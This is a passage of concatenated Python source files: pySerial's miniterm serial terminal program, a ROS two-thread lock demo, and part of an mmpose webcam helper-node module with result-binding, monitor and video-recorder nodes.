"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import select
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
# an additional pipe is used in getkey, so that the cancel method
# can abort the waiting getkey method
self.pipe_r, self.pipe_w = os.pipe()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
ready, _, _ = select.select([self.enc_stdin, self.pipe_r], [], [], None)
if self.pipe_r in ready:
os.read(self.pipe_r, 1)
return
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
os.write(self.pipe_w, b"x")
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
python_multithreading_example.py
|
#! /usr/bin/python
import threading
from threading import Thread, Lock
from std_msgs.msg import String
from time import sleep
import copy
import rospy
import random
# These will be initialized later
pub1 = None
pub2 = None
kill = False
# Create a lock that controls who has the ball
beach_lock = Lock()
""" Simple class that will be passed back and forth
betweeen threads. For learning purposes only"""
class BeachBall:
def __init__(self):
self.hits = 1
self.court_side = "No one has the ball"
# Initialize the beach ball
ball = BeachBall()
# Function 1 will be run by thread1
def function1(args):
while not kill:
print("hello1 from thread1")
# Get the lock so thread2 does not steal the ball
beach_lock.acquire()
ball.court_side = "thread 1 has the ball"
# Deep copy the ball so that we can release the
# lock.
myball = copy.deepcopy(ball)
beach_lock.release() # let thread2 have the ball
# ONLY PUBLISH THE DEEP COPIED VALUE
pub1.publish(
String(myball.court_side))
# Force the threads to run at different rates
# so that if someone remove the locks, the ball
# will get stolen
# (For demo purposes only)
sleep(random.randint(50, 200) / 100.0)
# Function2 will be called by thread2
def function2(args):
while not kill:
print("hello2 from thread2")
# Get the lock so thread1 does not steal the ball
beach_lock.acquire()
ball.court_side = "Thread 2 got the ball"
# Deep copy the ball so that we can release the
# lock.
myball = copy.deepcopy(ball)
beach_lock.release() # let thread1 get the ball
# ONLY PUBLISH THE DEEP COPIED VALUE
pub2.publish(
String(myball.court_side))
# Force the threads to run at different rates
# so that if someone remove the locks, the ball
# will get stolen
# (For demo purposes only)
sleep(random.randint(50, 200) / 100.0)
if __name__ == "__main__":
print('Initializing')
rospy.init_node("threadripper")
# initialize the publishers PRIOR to running the
# threads
# use 'rotopic echo /t1' to view thread1's output
# use 'rostopic echo/t2' to view thread2's output
pub1 = rospy.Publisher("/t1", String, queue_size=2)
pub2 = rospy.Publisher("/t2", String, queue_size=2)
print('Launching threads')
# Creat the threads, pass in a useless argument
t1 = Thread(target=function1, args=(10,))
t2 = Thread(target=function2, args=(10,))
# Let the games begin!
t1.start()
t2.start()
# Wait for a CTRL-C or a roslaunch kill (IMPORTANT)
while not rospy.is_shutdown():
pass
# Tell the threads to die
kill = True
# wait for the threads to terminate
t1.join()
t2.join()
# hooray, we done boys
print("Threads finished, done")
|
helper_node.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import logging
import time
from queue import Full, Queue
from threading import Thread
from typing import List, Optional, Union
import cv2
import numpy as np
from mmcv import color_val
from mmpose.utils.timer import RunningAverage
from .builder import NODES
from .node import Node
try:
import psutil
psutil_proc = psutil.Process()
except (ImportError, ModuleNotFoundError):
psutil_proc = None
@NODES.register_module()
class ModelResultBindingNode(Node):
def __init__(self, name: str, frame_buffer: str, result_buffer: str,
output_buffer: Union[str, List[str]]):
super().__init__(name=name, enable=True)
self.synchronous = None
# Cache the latest model result
self.last_result_msg = None
self.last_output_msg = None
# Inference speed analysis
self.frame_fps = RunningAverage(window=10)
self.frame_lag = RunningAverage(window=10)
self.result_fps = RunningAverage(window=10)
self.result_lag = RunningAverage(window=10)
# Register buffers
# Note that essential buffers will be set in set_runner() because
# it depends on the runner.synchronous attribute.
self.register_input_buffer(result_buffer, 'result', essential=False)
self.register_input_buffer(frame_buffer, 'frame', essential=False)
self.register_output_buffer(output_buffer)
def set_runner(self, runner):
super().set_runner(runner)
# Set synchronous according to the runner
if runner.synchronous:
self.synchronous = True
essential_input = 'result'
else:
self.synchronous = False
essential_input = 'frame'
# Set essential input buffer according to the synchronous setting
for buffer_info in self._input_buffers:
if buffer_info.input_name == essential_input:
buffer_info.essential = True
def process(self, input_msgs):
result_msg = input_msgs['result']
# Update last result
if result_msg is not None:
# Update result FPS
if self.last_result_msg is not None:
self.result_fps.update(
1.0 /
(result_msg.timestamp - self.last_result_msg.timestamp))
# Update inference latency
self.result_lag.update(time.time() - result_msg.timestamp)
# Update last inference result
self.last_result_msg = result_msg
if not self.synchronous:
# Asynchronous mode: Bind the latest result with the current frame.
frame_msg = input_msgs['frame']
self.frame_lag.update(time.time() - frame_msg.timestamp)
# Bind result to frame
if self.last_result_msg is not None:
frame_msg.set_full_results(
self.last_result_msg.get_full_results())
frame_msg.merge_route_info(
self.last_result_msg.get_route_info())
output_msg = frame_msg
else:
# Synchronous mode: Directly output the frame that the model result
# was obtained from.
self.frame_lag.update(time.time() - result_msg.timestamp)
output_msg = result_msg
# Update frame fps and lag
if self.last_output_msg is not None:
self.frame_lag.update(time.time() - output_msg.timestamp)
self.frame_fps.update(
1.0 / (output_msg.timestamp - self.last_output_msg.timestamp))
self.last_output_msg = output_msg
return output_msg
def _get_node_info(self):
info = super()._get_node_info()
info['result_fps'] = self.result_fps.average()
info['result_lag (ms)'] = self.result_lag.average() * 1000
info['frame_fps'] = self.frame_fps.average()
info['frame_lag (ms)'] = self.frame_lag.average() * 1000
return info
@NODES.register_module()
class MonitorNode(Node):
_default_ignore_items = ['timestamp']
def __init__(self,
name: str,
frame_buffer: str,
output_buffer: Union[str, List[str]],
enable_key: Optional[Union[str, int]] = None,
enable: bool = False,
x_offset=20,
y_offset=20,
y_delta=15,
text_color='black',
background_color=(255, 183, 0),
text_scale=0.4,
ignore_items: Optional[List[str]] = None):
super().__init__(name=name, enable_key=enable_key, enable=enable)
self.x_offset = x_offset
self.y_offset = y_offset
self.y_delta = y_delta
self.text_color = color_val(text_color)
self.background_color = color_val(background_color)
self.text_scale = text_scale
if ignore_items is None:
self.ignore_items = self._default_ignore_items
else:
self.ignore_items = ignore_items
self.register_input_buffer(frame_buffer, 'frame', essential=True)
self.register_output_buffer(output_buffer)
def process(self, input_msgs):
frame_msg = input_msgs['frame']
frame_msg.update_route_info(
node_name='System Info',
node_type='dummy',
info=self._get_system_info())
img = frame_msg.get_image()
route_info = frame_msg.get_route_info()
img = self._show_route_info(img, route_info)
frame_msg.set_image(img)
return frame_msg
def _get_system_info(self):
sys_info = {}
if psutil_proc is not None:
sys_info['CPU(%)'] = psutil_proc.cpu_percent()
sys_info['Memory(%)'] = psutil_proc.memory_percent()
return sys_info
def _show_route_info(self, img, route_info):
canvas = np.full(img.shape, self.background_color, dtype=img.dtype)
x = self.x_offset
y = self.y_offset
max_len = 0
def _put_line(line=''):
nonlocal y, max_len
cv2.putText(canvas, line, (x, y), cv2.FONT_HERSHEY_DUPLEX,
self.text_scale, self.text_color, 1)
y += self.y_delta
max_len = max(max_len, len(line))
for node_info in route_info:
title = f'{node_info["node"]}({node_info["node_type"]})'
_put_line(title)
for k, v in node_info['info'].items():
if k in self.ignore_items:
continue
if isinstance(v, float):
v = f'{v:.1f}'
_put_line(f' {k}: {v}')
x1 = max(0, self.x_offset)
x2 = min(img.shape[1], int(x + max_len * self.text_scale * 20))
y1 = max(0, self.y_offset - self.y_delta)
y2 = min(img.shape[0], y)
src1 = canvas[y1:y2, x1:x2]
src2 = img[y1:y2, x1:x2]
img[y1:y2, x1:x2] = cv2.addWeighted(src1, 0.5, src2, 0.5, 0)
return img
def bypass(self, input_msgs):
return input_msgs['frame']
@NODES.register_module()
class RecorderNode(Node):
"""Record the frames into a local file."""
def __init__(
self,
name: str,
frame_buffer: str,
output_buffer: Union[str, List[str]],
out_video_file: str,
out_video_fps: int = 30,
out_video_codec: str = 'mp4v',
buffer_size: int = 30,
):
super().__init__(name=name, enable_key=None, enable=True)
self.queue = Queue(maxsize=buffer_size)
self.out_video_file = out_video_file
self.out_video_fps = out_video_fps
self.out_video_codec = out_video_codec
self.vwriter = None
# Register buffers
self.register_input_buffer(frame_buffer, 'frame', essential=True)
self.register_output_buffer(output_buffer)
# Start a new thread to write frame
self.t_record = Thread(target=self._record, args=(), daemon=True)
self.t_record.start()
def process(self, input_msgs):
frame_msg = input_msgs['frame']
img = frame_msg.get_image() if frame_msg is not None else None
img_queued = False
while not img_queued:
try:
self.queue.put(img, timeout=1)
img_queued = True
logging.info(f'{self.name}: recorder received one frame!')
except Full:
logging.info(f'{self.name}: recorder jamed!')
return frame_msg
def _record(self):
while True:
img = self.queue.get()
if img is None:
break
if self.vwriter is None:
fourcc = cv2.VideoWriter_fourcc(*self.out_video_codec)
fps = self.out_video_fps
frame_size = (img.shape[1], img.shape[0])
self.vwriter = cv2.VideoWriter(self.out_video_file, fourcc,
fps, frame_size)
